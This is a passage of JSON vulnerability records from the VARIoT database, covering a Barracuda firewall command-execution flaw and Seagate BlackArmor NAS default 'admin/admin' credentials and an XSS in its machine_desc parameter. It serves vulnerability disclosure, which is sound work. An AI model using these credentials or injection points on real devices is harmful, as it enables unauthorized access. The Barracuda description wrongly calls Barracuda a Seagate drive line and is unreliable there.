"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2016-06010",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2016-06010",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Barracuda is the general name for a hard drive product line from Seagate Technology. BarracudaWebAppFirewallFirmware, LoadBalancerFirmware has a remote command execution vulnerability. An attack can exploit this vulnerability and inject it into a system command by sending a specially crafted request.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "EXPLOITDB",
"id": "40176",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "40176",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2016-06010",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"id": "VAR-201608-0496",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"last_update_date": "2022-05-17T01:46:27.084000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/40176/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Barracuda Web App Firewall/Load Balancer Remote Command Execution Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
],
"trust": 0.6
}
}
VAR-201309-0592
Vulnerability from variot - Updated: 2022-05-04 09:57The Seagate BlackArmor NAS is a network storage device. Seagate BlackArmor NAS 110 / 220 has a default user account \"admin/admin\" that allows remote attackers to use this account to gain unauthorized access to the device.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201309-0592",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "technology llc blackarmor nas",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "110"
},
{
"model": "technology llc blackarmor nas",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "220"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-13029",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-13029",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Seagate BlackArmor NAS is a network storage device. Seagate BlackArmor NAS 110 / 220 has a default user account \\\"admin/admin\\\" that allows remote attackers to use this account to gain unauthorized access to the device.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-13029",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"id": "VAR-201309-0592",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"last_update_date": "2022-05-04T09:57:22.267000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dariusfreamon.wordpress.com/2013/09/10/seagate-nas-default-credentials-and-xss/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13029"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS 110 / 220 WEB Interface Default Management Account Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13029"
}
],
"trust": 0.6
}
}
VAR-201309-0596
Vulnerability from variot - Updated: 2022-05-04 09:05The Seagate BlackArmor NAS is a network storage device. The Seagate BlackArmor NAS 110 / 220 /admin/system_general.php script incorrectly filters the input submitted by the 'machine_desc' parameter, allowing remote attackers to exploit the vulnerability to inject malicious scripts or HTML code to obtain sensitive information or hijack users when malicious data is viewed Conversation.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201309-0596",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "technology llc blackarmor nas",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "110"
},
{
"model": "technology llc blackarmor nas",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "220"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-13028",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-13028",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Seagate BlackArmor NAS is a network storage device. The Seagate BlackArmor NAS 110 / 220 /admin/system_general.php script incorrectly filters the input submitted by the \u0027machine_desc\u0027 parameter, allowing remote attackers to exploit the vulnerability to inject malicious scripts or HTML code to obtain sensitive information or hijack users when malicious data is viewed Conversation.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-13028",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"id": "VAR-201309-0596",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"last_update_date": "2022-05-04T09:05:38.864000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dariusfreamon.wordpress.com/2013/09/10/seagate-nas-default-credentials-and-xss/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13028"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS 110 / 220 machine_desc parameter cross-site scripting vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13028"
}
],
"trust": 0.6
}
}